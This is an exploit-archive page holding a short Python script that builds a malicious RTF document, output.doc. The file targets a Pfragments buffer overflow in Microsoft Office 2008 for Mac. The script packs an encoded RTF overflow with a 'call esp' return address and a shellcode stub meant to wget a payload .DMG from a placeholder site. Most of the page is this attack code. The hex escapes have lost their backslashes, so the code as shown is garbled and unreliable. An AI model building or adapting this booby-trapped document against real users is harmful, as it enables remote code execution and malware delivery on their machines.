Office 2008 sp0 RTF Pfragments MAC exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Office 2008 sp0 RTF Pfragments MAC exploit
# Published : 2012-04-18
# Author :
# Previous Title : Irfanview JPEG2000 <= v4.3.2.0 jp2 Stack Buffer Overflow
# Next Title : Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 Buffer Overflow (ASLR and DEP Bypass)

#RTF Pfragments exploit for MAC office 2008
#Author Abhishek Lyall - abhilyall[at]gmail[dot]com, info[at]aslitsecurity[dot]com
#Advanced Hacking Trainings - http://training.aslitsecurity.com
#Web - http://www.aslitsecurity.com/
#Blog - http://www.aslitsecurity.blogspot.com/
#Office 2007 for MC SP 0
#!/usr/bin/python

myfile = (
"x7bx5cx72x74x66x31x7bx5cx73x68x70x7bx5cx73x70x7b" 
"x5cx73x6ex20x70x46x72x61x67x6dx65x6ex74x73x7dx7b" 
"x5cx73x76x20x39x3bx32x3bx31x31x31x31x31x31x31x31" 
"x37x35x30x30x32x32x32x32x32x32x32x32x32x32x32x32" 
"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32" 
"x32x32x32x32x32x32x32x32x32x32x32x32"
"f069837c"  # call esp
"x31x31x31x31x31x31x31x31x31x31x31x31"
"x31x31x31x31x31x31x31x31x31x31x31x31x31x31x31x31" 
"x31x31x31x31x30x30x30x30x30x30x30x30x62x61x30x30" 
"x30x30x35x30x30x30x36x36x38x31x63x61x66x66x30x66" 
"x34x32x35x32x36x61x30x32x35x38x63x64x32x65x33x63" 
"x30x35x35x61x37x34x65x66x62x38x37x30x36x39x36x65"
"x36x37x38x62x66x61x61x66x37x35x65x61x61x66x37x35" 
"x65x37x35x37x63x33x7dx7dx7dx7d"
)

sign = (
"x70x69x6ex67x70x69x6ex67"
)

shellcode = "xCCxCCxCCxCC"
shellcode += "http://www.site.com/payload.DMG"
shellcode += "x11x3Ax65x89x11x3Ax65x89x11x3Ax65x89" #("wget http://")
shellcode += "wget "
shellcode += "x1Ax18x19x02"

exploit = open("output.doc", mode="wb")
exploit.write(myfile + sign + shellcode)
print "Done"